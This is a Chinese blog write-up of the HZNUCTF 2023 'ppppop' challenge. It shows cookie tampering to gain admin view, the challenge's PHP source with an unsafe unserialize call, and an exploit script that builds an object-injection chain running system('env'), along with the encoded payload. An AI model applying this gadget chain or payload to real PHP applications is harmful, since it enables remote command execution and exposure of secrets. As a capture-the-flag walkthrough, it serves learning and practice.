[HZNUCTF 2023 preliminary]ppppop

[HZNUCTF 2023 preliminary]ppppop

打开靶机,发现界面空白,发现cookie的内容:O:4:"User":1:{s:7:"isAdmin";b:0;}

把0改成1,显示源码:

<?php 
error_reporting(0); 
include('utils.php'); 

class A { 
  public $className; 
  public $funcName; 
  public $args; 

  public function __destruct() { 
    $class = new $this->className; 
    $funcName = $this->funcName; 
    $class->$funcName($this->args); 
  } 
} 

class B { 
  public function __call($func, $arg) { 
    $func($arg[0]); 
  } 
} 

if(checkUser()) { 
  highlight_file(__FILE__); 
  $payload = strrev(base64_decode($_POST['payload'])); 
  unserialize($payload); 
}

构造:

<?php

class A {
    public $className="B";
    public $funcName="system";
    public $args="env";

    public function __destruct() {
        $class = new $this->className;
        //var_dump($class);
        $funcName = $this->funcName;
        $class->$funcName($this->args);
    }

}

class B {
    public function __call($func, $arg) {
        $func($arg[0]);
    }
}

$a = new A();
$b = new B();
//echo serialize($a);
echo base64_encode(strrev(serialize($a)));

image-20230621233532164

POST:payload=fTsidm5lIjozOnM7InNncmEiOjQ6czsibWV0c3lzIjo2OnM7ImVtYU5jbnVmIjo4OnM7IkIiOjE6czsiZW1hTnNzYWxjIjo5OnN7OjM6IkEiOjE6Tw==

image-20230621233602450

posted @ 2023-06-21 23:41  Magic水瓶  阅读(255)  评论(0)    收藏  举报